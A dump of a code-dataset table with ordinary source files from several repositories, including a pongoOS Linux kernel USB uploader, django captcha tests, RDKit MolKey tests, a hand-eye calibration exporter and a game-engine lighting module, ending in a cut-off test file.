max_stars_repo_path (stringlengths 4-245) | max_stars_repo_name (stringlengths 7-115) | max_stars_count (int64 101-368k) | id (stringlengths 2-8) | content (stringlengths 6-1.03M) |
---|---|---|---|---|
scripts/load_linux.py | checkra1n/PongoKit | 114 | 11086045 |
#!/usr/bin/env python3
import usb.core
import struct
import sys
import argparse
import time
parser = argparse.ArgumentParser(description='A little Linux kernel/initrd uploader for pongoOS.')
parser.add_argument('-k', '--kernel', dest='kernel', help='path to kernel image')
parser.add_argument('-d', '--dtbpack', dest='dtbpack', help='path to dtbpack')
parser.add_argument('-r', '--initrd', dest='initrd', help='path to initial ramdisk')
parser.add_argument('-c', '--cmdline', dest='cmdline', help='custom kernel command line')
args = parser.parse_args()
if args.kernel is None:
print(f"error: No kernel specified! Run `{sys.argv[0]} --help` for usage.")
exit(1)
if args.dtbpack is None:
print(f"error: No dtbpack specified! Run `{sys.argv[0]} --help` for usage.")
exit(1)
dev = usb.core.find(idVendor=0x05ac, idProduct=0x4141)
if dev is None:
print("Waiting for device...")
while dev is None:
dev = usb.core.find(idVendor=0x05ac, idProduct=0x4141)
if dev is not None:
dev.set_configuration()
break
time.sleep(2)
else:
dev.set_configuration()
kernel = open(args.kernel, "rb").read()
fdt = open(args.dtbpack, "rb").read()
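# Each payload below is uploaded the same way: control transfers prepare the device
# and (where applicable) announce the payload size, a bulk write on endpoint 2 sends
# the data, and a final control transfer submits a pongoOS shell command for it.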
if args.cmdline is not None:
dev.ctrl_transfer(0x21, 4, 0, 0, 0)
dev.ctrl_transfer(0x21, 3, 0, 0, f"linux_cmdline {args.cmdline}\n")
if args.initrd is not None:
print("Loading initial ramdisk...")
initrd = open(args.initrd, "rb").read()
initrd_size = len(initrd)
dev.ctrl_transfer(0x21, 2, 0, 0, 0)
dev.ctrl_transfer(0x21, 1, 0, 0, struct.pack('I', initrd_size))
dev.write(2, initrd, 1000000)
dev.ctrl_transfer(0x21, 4, 0, 0, 0)
dev.ctrl_transfer(0x21, 3, 0, 0, "ramdisk\n")
print("Initial ramdisk loaded successfully.")
print("Loading device tree...")
dev.ctrl_transfer(0x21, 2, 0, 0, 0)
dev.ctrl_transfer(0x21, 1, 0, 0, 0)
dev.write(2, fdt)
dev.ctrl_transfer(0x21, 4, 0, 0, 0)
dev.ctrl_transfer(0x21, 3, 0, 0, "fdt\n")
print("Device tree loaded successfully.")
print("Loading kernel...")
kernel_size = len(kernel)
dev.ctrl_transfer(0x21, 2, 0, 0, 0)
dev.ctrl_transfer(0x21, 1, 0, 0, struct.pack('I', kernel_size))
dev.write(2, kernel, 1000000)
print("Kernel loaded successfully.")
dev.ctrl_transfer(0x21, 4, 0, 0, 0)
print("Booting...")
try:
dev.ctrl_transfer(0x21, 3, 0, 0, "bootl\n")
except:
# if the device disconnects without acknowledging it usually means it succeeded
print("Success.")
|
securityheaders/checkers/cors/allowcredentials/__init__.py | th3cyb3rc0p/securityheaders | 151 | 11086055 |
from .checker import AccessControlAllowCredentialsChecker
__all__ = ['AccessControlAllowCredentialsChecker']
|
proplot/internals/context.py | lukelbd/panplot | 633 | 11086056 |
#!/usr/bin/env python3
"""
Utilities for managing context.
"""
from . import ic # noqa: F401
class _empty_context(object):
"""
A dummy context manager.
"""
def __init__(self):
pass
def __enter__(self):
pass
def __exit__(self, *args): # noqa: U100
pass
class _state_context(object):
"""
Temporarily modify attribute(s) for an arbitrary object.
"""
def __init__(self, obj, **kwargs):
self._obj = obj
self._attrs_new = kwargs
self._attrs_prev = {
key: getattr(obj, key) for key in kwargs if hasattr(obj, key)
}
def __enter__(self):
for key, value in self._attrs_new.items():
setattr(self._obj, key, value)
def __exit__(self, *args): # noqa: U100
for key in self._attrs_new.keys():
if key in self._attrs_prev:
setattr(self._obj, key, self._attrs_prev[key])
else:
delattr(self._obj, key)
|
captcha/tests/__init__.py | shaoyh/django-simple-captcha | 108 | 11086065 | # -*- coding: utf-8 -*-
from captcha.conf import settings
from captcha.models import CaptchaStore
from django.core.urlresolvers import reverse
from django.test import TestCase
from django.utils.translation import ugettext_lazy as _
from django.core.exceptions import ImproperlyConfigured
from django.core.urlresolvers import reverse
import datetime
class CaptchaCase(TestCase):
urls = 'captcha.tests.urls'
def setUp(self):
self.default_challenge = settings.get_challenge()()
self.math_challenge = settings._callable_from_string('captcha.helpers.math_challenge')()
self.chars_challenge = settings._callable_from_string('captcha.helpers.random_char_challenge')()
self.unicode_challenge = settings._callable_from_string('captcha.helpers.unicode_challenge')()
self.default_store, created = CaptchaStore.objects.get_or_create(challenge=self.default_challenge[0],response=self.default_challenge[1])
self.math_store, created = CaptchaStore.objects.get_or_create(challenge=self.math_challenge[0],response=self.math_challenge[1])
self.chars_store, created = CaptchaStore.objects.get_or_create(challenge=self.chars_challenge[0],response=self.chars_challenge[1])
self.unicode_store, created = CaptchaStore.objects.get_or_create(challenge=self.unicode_challenge[0],response=self.unicode_challenge[1])
def testImages(self):
for key in (self.math_store.hashkey, self.chars_store.hashkey, self.default_store.hashkey, self.unicode_store.hashkey):
response = self.client.get(reverse('captcha-image',kwargs=dict(key=key)))
self.failUnlessEqual(response.status_code, 200)
self.assertTrue(response.has_header('content-type'))
self.assertEquals(response._headers.get('content-type'), ('Content-Type', 'image/png'))
def testAudio(self):
if not settings.CAPTCHA_FLITE_PATH:
return
for key in (self.math_store.hashkey, self.chars_store.hashkey, self.default_store.hashkey, self.unicode_store.hashkey):
response = self.client.get(reverse('captcha-audio',kwargs=dict(key=key)))
self.failUnlessEqual(response.status_code, 200)
self.assertTrue(len(response.content) > 1024)
self.assertTrue(response.has_header('content-type'))
self.assertEquals(response._headers.get('content-type'), ('Content-Type', 'audio/x-wav'))
def testFormSubmit(self):
r = self.client.get(reverse('captcha-test'))
self.failUnlessEqual(r.status_code, 200)
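# Scrape the 40-character captcha hashkey from the first value="..." attribute in the rendered form.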
hash_ = r.content[r.content.find('value="')+7:r.content.find('value="')+47]
try:
response = CaptchaStore.objects.get(hashkey=hash_).response
except:
self.fail()
r = self.client.post(reverse('captcha-test'), dict(captcha_0=hash_,captcha_1=response, subject='xxx', sender='<EMAIL>'))
self.failUnlessEqual(r.status_code, 200)
self.assertTrue(r.content.find('Form validated') > 0)
r = self.client.post(reverse('captcha-test'), dict(captcha_0=hash_,captcha_1=response, subject='xxx', sender='<EMAIL>'))
self.failUnlessEqual(r.status_code, 200)
self.assertFalse(r.content.find('Form validated') > 0)
def testWrongSubmit(self):
r = self.client.get(reverse('captcha-test'))
self.failUnlessEqual(r.status_code, 200)
r = self.client.post(reverse('captcha-test'), dict(captcha_0='abc',captcha_1='wrong response', subject='xxx', sender='<EMAIL>'))
self.assertFormError(r,'form','captcha',_('Invalid CAPTCHA'))
def testDeleteExpired(self):
self.default_store.expiration = datetime.datetime.now() - datetime.timedelta(minutes=5)
self.default_store.save()
hash_ = self.default_store.hashkey
r = self.client.post(reverse('captcha-test'), dict(captcha_0=hash_,captcha_1=self.default_store.response, subject='xxx', sender='<EMAIL>'))
self.failUnlessEqual(r.status_code, 200)
self.assertFalse(r.content.find('Form validated') > 0)
# expired -> deleted
try:
CaptchaStore.objects.get(hashkey=hash_)
self.fail()
except:
pass
def testCustomErrorMessage(self):
r = self.client.get(reverse('captcha-test-custom-error-message'))
self.failUnlessEqual(r.status_code, 200)
# Wrong answer
r = self.client.post(reverse('captcha-test-custom-error-message'), dict(captcha_0='abc',captcha_1='wrong response'))
self.assertFormError(r,'form','captcha','TEST CUSTOM ERROR MESSAGE')
# empty answer
r = self.client.post(reverse('captcha-test-custom-error-message'), dict(captcha_0='abc',captcha_1=''))
self.assertFormError(r,'form','captcha',_('This field is required.'))
def testRepeatedChallenge(self):
store = CaptchaStore.objects.create(challenge='xxx',response='xxx')
try:
store2 = CaptchaStore.objects.create(challenge='xxx',response='xxx')
except Exception:
self.fail()
def testRepeatedChallengeFormSubmit(self):
settings.CAPTCHA_CHALLENGE_FUNCT = 'captcha.tests.trivial_challenge'
r1 = self.client.get(reverse('captcha-test'))
r2 = self.client.get(reverse('captcha-test'))
self.failUnlessEqual(r1.status_code, 200)
self.failUnlessEqual(r2.status_code, 200)
hash_1 = r1.content[r1.content.find('value="')+7:r1.content.find('value="')+47]
hash_2 = r2.content[r2.content.find('value="')+7:r2.content.find('value="')+47]
try:
store_1 = CaptchaStore.objects.get(hashkey=hash_1)
store_2 = CaptchaStore.objects.get(hashkey=hash_2)
except:
self.fail()
self.assertTrue(store_1.pk != store_2.pk)
self.assertTrue(store_1.response == store_2.response)
self.assertTrue(hash_1 != hash_2)
r1 = self.client.post(reverse('captcha-test'), dict(captcha_0=hash_1,captcha_1=store_1.response, subject='xxx', sender='<EMAIL>'))
self.failUnlessEqual(r1.status_code, 200)
self.assertTrue(r1.content.find('Form validated') > 0)
try:
store_2 = CaptchaStore.objects.get(hashkey=hash_2)
except:
self.fail()
r2 = self.client.post(reverse('captcha-test'), dict(captcha_0=hash_2,captcha_1=store_2.response, subject='xxx', sender='<EMAIL>'))
self.failUnlessEqual(r2.status_code, 200)
self.assertTrue(r2.content.find('Form validated') > 0)
def testOutputFormat(self):
settings.CAPTCHA_OUTPUT_FORMAT = u'%(image)s<p>Hello, captcha world</p>%(hidden_field)s%(text_field)s'
r = self.client.get(reverse('captcha-test'))
self.failUnlessEqual(r.status_code, 200)
self.assertTrue('<p>Hello, captcha world</p>' in r.content)
def testInvalidOutputFormat(self):
settings.CAPTCHA_OUTPUT_FORMAT = u'%(image)s'
try:
r = self.client.get(reverse('captcha-test'))
self.fail()
except ImproperlyConfigured,e:
self.failUnless('CAPTCHA_OUTPUT_FORMAT' in unicode(e))
def testPerFormFormat(self):
settings.CAPTCHA_OUTPUT_FORMAT = u'%(image)s testCustomFormatString %(hidden_field)s %(text_field)s'
r = self.client.get(reverse('captcha-test'))
self.failUnless('testCustomFormatString' in r.content)
r = self.client.get(reverse('test_per_form_format'))
self.failUnless('testPerFieldCustomFormatString' in r.content)
def testIssue31ProperLabel(self):
settings.CAPTCHA_OUTPUT_FORMAT = u'%(image)s %(hidden_field)s %(text_field)s'
r = self.client.get(reverse('captcha-test'))
self.failUnless('<label for="id_captcha_1"' in r.content)
def trivial_challenge():
return 'trivial','trivial'
|
hand_eye_calibration/bin/bag_to_csv_with_config.py | Chatoyant19/handeye_calibration | 333 | 11086129 |
#!/usr/bin/env python
from subprocess import call
import argparse
import copy
import rospy
import yaml
if __name__ == '__main__':
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument(
'--yaml_config_file', required=True,
help='A yaml file specifying topics and frames.')
args = parser.parse_args()
tf_arguments = ["rosrun", "hand_eye_calibration", "tf_to_csv.py"]
te_arguments = ["rosrun", "hand_eye_calibration",
"target_extractor_interface.py"]
with open(args.yaml_config_file, 'r') as stream:
try:
yaml_content = yaml.load(stream)
except yaml.YAMLError as exc:
print(exc)
bags = yaml_content['bags']
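# Each bag entry is expected to provide the bag location plus optional tf source/target
# frame pairs and camera topic/intrinsics pairs; every pair below is exported to its own CSV.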
for bag in bags:
bag_name = bag['name']
bag_name_without_suffix = bag_name.split('.')[0]
bag_path = bag['bag_path']
intrinsics_path = bag['intrinsics_path']
target_config_path = bag['target_config_path']
print("\n\nExporting poses from {}...\n".format(bag_name))
tf_frames = bag['tf_frames']
if tf_frames is None:
num_tf_source_frames = 0
num_tf_target_frames = 0
else:
num_tf_source_frames = len(tf_frames['source'])
num_tf_target_frames = len(tf_frames['target'])
assert num_tf_source_frames == num_tf_target_frames, "Source and target frames should have equal length."
for i in range(num_tf_source_frames):
tf_source_frame = tf_frames['source'][i]
tf_target_frame = tf_frames['target'][i]
print("Exporting poses of {} in {} frame".format(
tf_source_frame, tf_target_frame))
# Setup the args for tf_to_csv.py.
tf_call = copy.deepcopy(tf_arguments)
tf_call.append('--bag')
tf_call.append(bag_path + bag_name)
tf_call.append('--tf_source_frame')
tf_call.append(tf_source_frame)
tf_call.append('--tf_target_frame')
tf_call.append(tf_target_frame)
tf_call.append('--csv_output_file')
tf_call.append(bag_name_without_suffix + '_' +
tf_target_frame + '_' + tf_source_frame + '.csv')
call(tf_call)
cameras = bag['cameras']
equal_length_warning = ("Camera topics and intrinsic calibrations should "
"have equal length.")
if cameras is None:
num_camera_topics = 0
num_camera_intrinsics = 0
else:
num_camera_topics = len(cameras['cam_topics'])
num_camera_intrinsics = len(
cameras['cam_intrinsics'])
assert num_camera_topics == num_camera_intrinsics, equal_length_warning
target_config = bag['target']
for i in range(num_camera_topics):
camera_topic = cameras['cam_topics'][i]
camera_intrinsics = cameras['cam_intrinsics'][i]
print("Exporting {} poses in world (target) frame.".format(camera_topic))
# Setup the args for target_extractor_interface.py.
te_call = copy.deepcopy(te_arguments)
te_call.append('--bag')
te_call.append(bag_path + bag_name)
te_call.append('--image_topic')
te_call.append(camera_topic)
te_call.append('--calib_file_camera')
te_call.append(intrinsics_path + camera_intrinsics)
te_call.append('--calib_file_target')
te_call.append(target_config_path + target_config)
te_call.append('--output_file')
te_call.append(bag_name_without_suffix + '_' +
'W_' + camera_topic.replace("/", "_")[1:] + '.csv')
call(te_call)
|
L1Trigger/Configuration/python/L1DummyConfig_cff.py | ckamtsikis/cmssw | 852 | 11086166 |
import FWCore.ParameterSet.Config as cms
# for backwards compatibility
from L1Trigger.Configuration.L1Trigger_FakeConditions_cff import *
|
gwd/eda/submission.py | kazakh-shai/kaggle-global-wheat-detection | 136 | 11086177 |
import argparse
import os
import os.path as osp
import cv2
import numpy as np
import pandas as pd
from tqdm import tqdm
from gwd.eda.visualization import draw_bounding_boxes_on_image
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("--submission_path", default="/data/pseudo_universe_submission.csv")
parser.add_argument("--img_root", default="/data/test")
parser.add_argument("--output_root", default="/data/eda")
return parser.parse_args()
def convert_bboxes(bboxes):
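# Each prediction row is assumed to be [confidence, x, y, w, h]; move the confidence
# to the end and convert the box to [x_min, y_min, x_max, y_max, confidence].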
bboxes = np.concatenate([bboxes[:, 1:], bboxes[:, :1]], axis=1)
bboxes[:, 2] += bboxes[:, 0]
bboxes[:, 3] += bboxes[:, 1]
return bboxes
def main():
args = parse_args()
os.makedirs(args.output_root, exist_ok=True)
submission = pd.read_csv(args.submission_path)
for _, row in tqdm(submission.iterrows(), total=len(submission)):
image = cv2.imread(osp.join(args.img_root, f"{row.image_id}.jpg"))
bboxes = convert_bboxes(np.array(list(map(float, row.PredictionString.split()))).reshape(-1, 5))
draw_bounding_boxes_on_image(image, bboxes, use_normalized_coordinates=False, thickness=5)
cv2.imwrite(osp.join(args.output_root, f"{row.image_id}.jpg"), image)
if __name__ == "__main__":
main()
|
tests/bytecode/mp-tests/fun4.py | LabAixBidouille/micropython | 303 | 11086195 | def f(a, b=1, *c, d):
pass
#print(a,b,c,d) # bug in uPy!
f = lambda a, b, *c, d: None # default arg
#f = lambda a, b=1, *c, d: None # default arg for lambda not implemented
|
PyEngine3D/Render/Light.py | ubuntunux/PyEngine3D | 121 | 11086216 |
import numpy as np
from PyEngine3D.Utilities import *
from PyEngine3D.Common import logger
from PyEngine3D.Common.Constants import *
from PyEngine3D.App import CoreManager
from .Actor import StaticActor
class MainLight(StaticActor):
def __init__(self, name, **object_data):
StaticActor.__init__(self, name, **object_data)
self.light_color = Float4(*object_data.get('light_color', (1.0, 1.0, 1.0, 1.0)))
self.transform.set_rotation(object_data.get('rot', [-1.0, 0, 0]))
self.last_shadow_camera = None
self.last_shadow_position = FLOAT3_ZERO.copy()
self.shadow_samples = object_data.get('shadow_samples', SHADOW_SAMPLES)
self.shadow_exp = object_data.get('shadow_exp', SHADOW_EXP)
self.shadow_bias = object_data.get('shadow_bias', SHADOW_BIAS)
self.shadow_width = object_data.get('shadow_width', SHADOW_DISTANCE)
self.shadow_height = object_data.get('shadow_height', SHADOW_DISTANCE)
self.shadow_depth = object_data.get('shadow_depth', SHADOW_DISTANCE)
self.shadow_orthogonal = Matrix4()
self.shadow_view_projection = Matrix4()
self.changed = False
self.update_shadow_orthogonal()
def reset_changed(self):
self.changed = False
def update_shadow_orthogonal(self):
ortho(self.shadow_orthogonal,
-self.shadow_width, self.shadow_width,
-self.shadow_height, self.shadow_height,
-self.shadow_depth, self.shadow_depth)
self.changed = True
def get_attribute(self):
super().get_attribute()
self.attributes.set_attribute('light_color', self.light_color)
self.attributes.set_attribute('shadow_width', self.shadow_width)
self.attributes.set_attribute('shadow_height', self.shadow_height)
self.attributes.set_attribute('shadow_depth', self.shadow_depth)
self.attributes.set_attribute('shadow_exp', self.shadow_exp)
self.attributes.set_attribute('shadow_bias', self.shadow_bias)
self.attributes.set_attribute('shadow_samples', self.shadow_samples)
return self.attributes
def set_attribute(self, attribute_name, attribute_value, item_info_history, attribute_index):
if 'light_color' == attribute_name:
self.light_color[...] = attribute_value
self.changed = True
elif attribute_name in ('shadow_width', 'shadow_height', 'shadow_depth'):
setattr(self, attribute_name, attribute_value)
self.update_shadow_orthogonal()
else:
super().set_attribute(attribute_name, attribute_value, item_info_history, attribute_index)
def get_save_data(self):
save_data = StaticActor.get_save_data(self)
save_data['light_color'] = self.light_color.tolist()
save_data['shadow_width'] = self.shadow_width
save_data['shadow_height'] = self.shadow_height
save_data['shadow_depth'] = self.shadow_depth
save_data['shadow_exp'] = self.shadow_exp
save_data['shadow_bias'] = self.shadow_bias
save_data['shadow_samples'] = self.shadow_samples
return save_data
def update(self, current_camera):
changed = self.transform.update_transform(update_inverse_matrix=True)
self.changed = self.changed or changed
if current_camera is not None:
camera_pos = current_camera.transform.get_pos()
self.last_shadow_camera = current_camera
self.last_shadow_position[...] = camera_pos
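# Build the shadow view-projection: translate by the negated camera position, apply the
# light's inverse transform, then the orthographic shadow projection.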
set_translate_matrix(self.shadow_view_projection, *(-camera_pos))
self.shadow_view_projection[...] = np.dot(np.dot(self.shadow_view_projection, self.transform.inverse_matrix), self.shadow_orthogonal)
class PointLight(StaticActor):
def __init__(self, name, **object_data):
StaticActor.__init__(self, name, **object_data)
self.light_color = Float3(*object_data.get('light_color', (1.0, 1.0, 1.0)))
self.light_radius = object_data.get('light_radius', 10.0)
def get_attribute(self):
super().get_attribute()
self.attributes.set_attribute('light_color', self.light_color)
self.attributes.set_attribute('light_radius', self.light_radius)
return self.attributes
def set_attribute(self, attribute_name, attribute_value, item_info_history, attribute_index):
super().set_attribute(attribute_name, attribute_value, item_info_history, attribute_index)
if attribute_name == 'light_color':
self.light_color[:] = attribute_value[:]
elif hasattr(self, attribute_name):
setattr(self, attribute_name, attribute_value)
def get_save_data(self):
save_data = StaticActor.get_save_data(self)
save_data['light_color'] = self.light_color.tolist()
save_data['light_radius'] = self.light_radius
return save_data
def update(self):
self.transform.update_transform()
|
packages/Python/lldbsuite/test/lang/swift/playgrounds-repl/two_valid_inputs/TestTwoValidInputs.py | xiaobai/swift-lldb | 765 | 11086228 | # TestTwoValidBlocks.py
#
# This source file is part of the Swift.org open source project
#
# Copyright (c) 2014 - 2016 Apple Inc. and the Swift project authors
# Licensed under Apache License v2.0 with Runtime Library Exception
#
# See https://swift.org/LICENSE.txt for license information
# See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
#
# ------------------------------------------------------------------------------
"""
Test that statements made in one block can be referenced in a proceeding block
"""
import lldbsuite.test.lldbplaygroundrepl as repl
from lldbsuite.test.lldbtest import *
class TestTwoValidInputs(repl.PlaygroundREPLTest):
mydir = repl.PlaygroundREPLTest.compute_mydir(__file__)
def do_test(self):
"""
Test that statements made in one block can be referenced in a
proceeding block
"""
# Execute first block
result, output = self.execute_code("Input1.swift")
playground_output = output.GetSummary()
if self.is_compile_or_runtime_error(result):
self.did_crash(result)
self.assertTrue(False)
self.assertTrue(playground_output is not None)
self.assertTrue("a=\\'3\\'" in playground_output)
self.assertTrue("b=\\'5\\'" in playground_output)
# Execute second block
result, output = self.execute_code("Input2.swift")
playground_output = output.GetSummary()
if self.is_compile_or_runtime_error(result):
self.did_crash(result)
self.assertTrue(False)
self.assertTrue(playground_output is not None)
self.assertTrue("=\\'8\\'" in playground_output) |
mmdet/utils/collect_env.py | Karybdis/mmdetection-mini | 834 | 11086232 |
from mmdet.cv_core.utils.env import collect_env as collect_base_env
def collect_env():
"""Collect the information of the running environments."""
env_info = collect_base_env()
return env_info
if __name__ == '__main__':
for name, val in collect_env().items():
print(f'{name}: {val}')
|
nuplan/planning/metrics/evaluation_metrics/common/ego_jerk.py | motional/nuplan-devkit | 128 | 11086251 | from typing import List
from nuplan.planning.metrics.evaluation_metrics.base.within_bound_metric_base import WithinBoundMetricBase
from nuplan.planning.metrics.metric_result import MetricStatistics
from nuplan.planning.metrics.utils.state_extractors import extract_ego_jerk
from nuplan.planning.scenario_builder.abstract_scenario import AbstractScenario
from nuplan.planning.simulation.history.simulation_history import SimulationHistory
class EgoJerkStatistics(WithinBoundMetricBase):
"""Ego jerk metric."""
def __init__(self, name: str, category: str, max_abs_mag_jerk: float) -> None:
"""
Initializes the EgoJerkStatistics class
:param name: Metric name
:param category: Metric category
:param max_abs_mag_jerk: Maximum threshold to define if absolute jerk is within bound.
"""
super().__init__(name=name, category=category)
self._max_abs_mag_jerk = max_abs_mag_jerk
def compute(self, history: SimulationHistory, scenario: AbstractScenario) -> List[MetricStatistics]:
"""
Returns the jerk metric
:param history: History from a simulation engine
:param scenario: Scenario running this metric
:return the estimated jerk metric.
"""
return self._compute_statistics( # type: ignore
history=history,
scenario=scenario,
statistic_unit_name='meters_per_second_cubed',
extract_function=extract_ego_jerk,
extract_function_params={'acceleration_coordinate': 'magnitude'},
max_within_bound_threshold=self._max_abs_mag_jerk,
)
|
comcrawl/core/__init__.py | akozlo/comcrawl | 118 | 11086254 |
"""This module exports the core class of the package."""
from .index_client import IndexClient
|
tools/gen_label_video_source.py | Xlsean/X-Temporal | 492 | 11086282 |
import os
from decord import VideoReader
from decord import cpu
if __name__ == '__main__':
root_dir = '' # video data root path
dataset_name = 'hmdb51'
with open(os.path.join('../datasets', dataset_name, 'category.txt')) as f:
lines = f.readlines()
categories = []
for line in lines:
line = line.rstrip()
categories.append(line)
dict_categories = {}
for i, category in enumerate(categories):
dict_categories[category] = i
filename_input = os.path.join('../datasets', dataset_name, 'vallist.txt')
filename_output = 'test_videofolder.txt'
with open(filename_input) as f:
lines = f.readlines()
videos = []
idx_categories = []
for line in lines:
line = line.rstrip()
videos.append(line)
label = line.split('/')[0]
idx_categories.append(dict_categories[label])
output = []
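# Each output line has the form "<relative video path> <frame count> <label index>".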
for i in range(len(videos)):
curVideo = videos[i]
curIDX = idx_categories[i]
video_file = os.path.join(root_dir, curVideo)
vr = VideoReader(os.path.join(root_dir, curVideo), ctx=cpu(0))
output.append('%s %d %d' % (curVideo, len(vr), curIDX))
print('%d/%d' % (i, len(videos)))  # progress over all videos
with open(filename_output, 'w') as f:
f.write('\n'.join(output))
|
rdkit/Chem/MolKey/UnitTestMolKey.py | kazuyaujihara/rdkit | 1,609 | 11086287 |
#
# @@ All Rights Reserved @@
# This file is part of the RDKit.
# The contents are covered by the terms of the BSD license
# which is included in the file license.txt, found at the root
# of the RDKit source tree.
#
import doctest
import unittest
from rdkit.Chem import inchi
from rdkit.TestRunner import redirect_stderr
import io
if inchi.INCHI_AVAILABLE:
from rdkit.Chem.MolKey.InchiInfo import InchiInfo
try:
from rdkit.Avalon import pyAvalonTools
from rdkit.Chem.MolKey import MolKey
_testMolKey = True
except ImportError:
_testMolKey = False
def load_tests(loader, tests, ignore):
""" Add the Doctests from the module """
if _testMolKey:
tests.addTests(doctest.DocTestSuite(MolKey, optionflags=doctest.ELLIPSIS))
return tests
@unittest.skipUnless(_testMolKey, 'Avalon tools and Inchi required')
class TestMolKey(unittest.TestCase):
def test_GetKeyForCTAB(self):
f = io.StringIO()
with redirect_stderr(f):
res = MolKey.GetKeyForCTAB('IncorrectCTAB')
self.assertNotEqual(res.error, 0)
s = f.getvalue()
self.assertIn('WARNING:', s)
def test_CheckCTAB(self):
self.assertRaises(MolKey.BadMoleculeException, MolKey.CheckCTAB, None)
self.assertRaises(MolKey.BadMoleculeException, MolKey.CheckCTAB, '')
ok, _ = MolKey.CheckCTAB('CCincorrect', isSmiles=True)
self.assertEqual(ok, 1)
ok, _ = MolKey.CheckCTAB('NO_STRUCTURE', isSmiles=True)
self.assertEqual(ok, MolKey.ERROR_DICT['NULL_MOL'])
ok, ctab = MolKey.CheckCTAB('CC', isSmiles=True)
self.assertEqual(ok, 0)
ok, ctab2 = MolKey.CheckCTAB(ctab, isSmiles=False)
self.assertEqual(ok, 0)
self.assertEqual(ctab, ctab2)
def test_GetInchiForCTAB(self):
self.assertRaises(MolKey.BadMoleculeException, MolKey.GetInchiForCTAB, 'IncorrectCTAB')
def test_ErrorBitsToText(self):
errors = MolKey.ErrorBitsToText(3)
self.assertIn('BAD_MOLECULE', errors)
self.assertIn('ALIAS_CONVERSION_FAILED', errors)
for k, v in MolKey.ERROR_DICT.items():
errors = MolKey.ErrorBitsToText(v)
self.assertEqual(len(errors), 1)
self.assertIn(k, errors)
def test_get_chiral_identification_string(self):
cases = [((0, 0), 'S_ACHIR'), # No stereo centers
((0, 1), 'R_ONE'), # One undefined stereo centers
((0, 2), 'S_UNKN'), # More than one undefined stereo centers
((0, 3), 'S_UNKN'), # More than one undefined stereo centers
((1, 0), 'S_ABS'), # Fully defined stereo center
((2, 0), 'S_ABS'), # Fully defined stereo centers
((1, 1), 'S_PART'), # Partially defined stereo centers
((2, 1), 'S_PART'), # Partially defined stereo centers
]
for (nDefined, nUndefined), expected in cases:
self.assertEqual(MolKey._get_chiral_identification_string(nDefined, nUndefined), expected)
GUANINE = 'InChI=1S/C5H5N5O/c6-5-9-3-2(4(11)10-5)7-1-8-3/h1H0,(H4,6,7,8,9,10,11)'
# 'N=C(-O)N', '/FixedH /SUU'
UREA1 = 'InChI=1/CH4N2O/c2-1(3)4/h(H4,2,3,4)/f/h2,4H,3H2/b2-1?'
# 'NC(=O)N', '/FixedH /SUU'
UREA2 = 'InChI=1/CH4N2O/c2-1(3)4/h(H4,2,3,4)/f/h2-3H2'
TRITIATED_UREA = 'InChI=1S/CH4N2O/c2-1(3)4/h(H4,2,3,4)/i/hT3'
DEUTERATED_UREA = 'InChI=1S/CH4N2O/c2-1(3)4/h(H4,2,3,4)/i/hD2'
ACETIC_ACID = 'InChI=1S/C3H6O2/c1-2-3(4)5/h2H2,1H3,(H,4,5)'
ACETATE = 'InChI=1S/C3H6O2/c1-2-3(4)5/h2H2,1H3,(H,4,5)/p-1'
mobile1 = 'InChI=1S/C5H5N3O2/c6-4(9)3-1-7-2-8-5(3)10/h1-2H,(H2,6,9)(H,7,8,10)' # invented
mobile2 = 'InChI=1S/C7H10N4O/c1-4-2-5(3-6(8)12)11-7(9)10-4/h2H,3H2,1H3,(H2,8,12)(H2,9,10,11)'
# sp3 stereo
sugar1 = 'InChI=1S/C14H20O9/c1-6-11(20-7(2)15)12(21-8(3)16)13(22-9(4)17)14(19-6)23-10(5)18/h6,11-14H,1-5H3/t6-,11-,12+,13+,14?/m0/s1' # L-rhamnopyranose (source: chemspider)
sugar2 = 'InChI=1S/C12H20O6/c1-11(2)14-5-6(16-11)8-7(13)9-10(15-8)18-12(3,4)17-9/h6-10,13H,5H2,1-4H3/t6-,7-,8-,9-,10-/m1/s1' # MFCD00135634 (Diacetone-D-Glucose, souce: chemspider)
sp3_unk = 'InChI=1S/C12H21NO4/c1-8(2)10(12(15)16-3)13-11(14)9-5-4-6-17-7-9/h8-10H,4-7H2,1-3H3,(H,13,14)/t9?,10-/m0/s1' # derived from ChemSpider 34044335
@unittest.skipUnless(inchi.INCHI_AVAILABLE, 'Inchi required')
class TestInchiInfo(unittest.TestCase):
def doTest(self, inchi, numSp3=0, numUndefSp3=0, numMobileHGroups=0, layer='non-isotopic'):
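# Parse the InChI and compare the sp3 stereo counts (total and undefined) and the
# number of mobile-H groups against the expected values for the requested layer.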
ii = InchiInfo(inchi)
nSp3, nUndefSp3, _, _ = ii.get_sp3_stereo()['main'][layer]
self.assertEqual(nSp3, numSp3)
self.assertEqual(nUndefSp3, numUndefSp3)
nMobileHGroups, _ = ii.get_mobile_h()['main'][layer]
self.assertEqual(nMobileHGroups, numMobileHGroups)
def testGuanine(self):
self.doTest(GUANINE, 0, 0, 1)
def testTritiatedUrea(self):
self.doTest(TRITIATED_UREA, 0, 0, 1)
def testDeuteratedUrea(self):
self.doTest(DEUTERATED_UREA, 0, 0, 1)
def testAceticAcid(self):
self.doTest(ACETIC_ACID, 0, 0, 1)
def testAcetate(self):
self.doTest(ACETATE, 0, 0, 1)
def testMobile1(self):
self.doTest(mobile1, 0, 0, 2)
def testMobile2(self):
self.doTest(mobile2, 0, 0, 2)
# sp3 stereo
def testSugar1(self):
self.doTest(sugar1, 5, 1, 0)
def testSugar2(self):
self.doTest(sugar2, 5, 0, 0)
def testSP3_unk(self):
self.doTest(sp3_unk, 2, 1, 1)
if __name__ == '__main__': # pragma: nocover
unittest.main()
|
upvote/gae/taskqueue/utils_test.py | iwikmai/upvote | 453 | 11086292 |
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for taskqueue_utils."""
from google.appengine.ext import deferred
from upvote.gae.lib.testing import basetest
from upvote.gae.taskqueue import utils
from upvote.shared import constants
class QueueSizeTest(basetest.UpvoteTestCase):
def testSuccess(self):
